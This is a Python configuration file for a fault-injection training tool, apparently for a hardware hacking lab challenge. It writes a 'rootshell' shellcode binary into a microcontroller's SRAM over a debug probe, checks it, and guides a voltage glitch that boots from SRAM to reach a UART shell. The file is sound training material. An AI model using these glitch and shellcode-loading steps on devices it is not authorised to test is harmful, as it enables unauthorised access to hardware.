Hardware / FaultInjection / examples / CuriousBolt / Level-1 / ConfigChall04.py
  1. ######
  2. # config to complete Level 1, Challenge 4 using "glitch-o-bolt"
  3. ######
  4. # LEAVE THESE IMPORTS!
  5. ######
  6. import time
  7. import functions
  8.  
  9. from pyocd.core.helpers import ConnectHelper
  10. from pyocd.flash.file_programmer import FileProgrammer
  11.  
  12. ######
  13. # config values
  14. ######
  15.  
# Serial device path and line speed.
# NOTE(review): presumably read by glitch-o-bolt when it opens the port - confirm.
SERIAL_PORT = "/dev/ttyUSB0"
BAUD_RATE = 115_200

# NOTE(review): presumably the glitch pulse settings consumed by glitch-o-bolt;
# the units are not stated in this file - confirm against the tool.
LENGTH = 50
REPEAT = 1
DELAY = 1
  22.  
###
# One row per condition: name, enabled, string to match, function name.
# The fourth field holds the name of a function defined further down in this
# file (start_chall_04, step_1, step_2).
# NOTE(review): how the tool resolves and calls that name is not shown here - confirm.
###
conditions = [
    ["Start", False, "", "start_chall_04"],
    ["Step1", False, "", "step_1"],
    ["Step2", False, "", "step_2"],
]
  31.  
  32. ######
  33. # Custom functions for conditions to trigger
  34. ######
  35.  
def start_chall_04():
    """Pass the manual preparation steps for Challenge 4 to functions.add_text.

    Nothing is sent to the board here; the three messages tell the operator
    which switches and buttons to use before pressing 'Step1'.
    """
    instructions = (
        "[Chall 4] enable uart switch then hold chall 4 button to load the challenge into memory.",
        "[Chall 4] once loaded hold 'boot 1' button and press 'reset' button to put in bootloader mode",
        "[Chall 4] then press 'Step1'",
    )
    for message in instructions:
        functions.add_text(message)
  40.  
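def step_1():
    """Write the challenge image to target RAM over the debug probe and verify it.

    Steps, in order:
      1. Turn the UART switch off and announce the upload.
      2. Open a pyOCD session, halt the target, write the binary to
         0x20000000, resume the target and release the probe.
      3. Read the image file, open a second session, halt the target and read
         the same address range back.
      4. Report whether the read-back matches the file.
      5. Set the UART baud rate to 9600 and print the manual next steps.

    Both sessions are used as context managers so the probe is released even
    when programming or the read-back raises; otherwise a failed upload would
    leave the probe open and the next connection attempt could fail.

    If no probe is chosen (session_with_chosen_probe() returns None) a message
    is printed and the function returns without printing the next steps.
    """
    # Base address used for both the write and the read-back; the messages
    # below describe it as RAM/SRAM.
    ram_base = 0x20000000

    # NOTE(review): this file sits under /tmp and is read twice, once by
    # FileProgrammer and once for the comparison. On a shared host /tmp is
    # writable by other users, so keep the image in a directory only the
    # operator can write to if the comparison is meant to be trusted.
    firmware_path = "/tmp/f103-analysis/h3/rootshell/shellcode-0xRoM.bin"

    functions.set_uart_switch(False)

    functions.add_text("\n[Chall 4] uploading firmware to ram... please wait")

    # First session: write the image into RAM.
    session = ConnectHelper.session_with_chosen_probe()
    if session is None:
        functions.add_text("[!] No debug probe selected. Nothing was uploaded.")
        return
    with session:
        target = session.target
        target.halt()

        programmer = FileProgrammer(session)
        programmer.program(firmware_path, base_address=ram_base, file_format='bin')

        target.resume()

    # Reference copy of the image for the comparison.
    with open(firmware_path, "rb") as f:
        original_data = f.read()

    # Second session: read the same range back from the halted target.
    session = ConnectHelper.session_with_chosen_probe()
    if session is None:
        functions.add_text("[!] No debug probe selected. Upload could not be verified.")
        return
    with session:
        target = session.target
        target.halt()
        read_data = target.read_memory_block8(ram_base, len(original_data))

    # A mismatch is only reported; the remaining steps still run, as before.
    if bytes(read_data) == original_data:
        functions.add_text("[+] Shellcode loaded successfully.")
    else:
        functions.add_text("[!] Mismatch detected. Shellcode may not have loaded correctly.")

    functions.change_baudrate(9600)
    functions.add_text("[Chall 4] hold buttons 'boot0' and 'boot1' and press the 'glitch' button")
    functions.add_text("[Chall 4] this single glitch will boot from SRAM")
    functions.add_text("[Chall 4] enable UART to access 'Low-level Shell' (might need to press reset)")
    functions.add_text("[Chall 4] then press 'Step2'")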
def step_2():
    """Send "p" over UART, wait one second, then set the baud rate to 115200."""
    command = "p"
    final_baud = 115200  # same value as BAUD_RATE in the config section

    functions.send_uart_message(command)
    # NOTE(review): presumably gives the target time to act on the command
    # before the line speed changes - confirm.
    time.sleep(1)
    functions.change_baudrate(final_baud)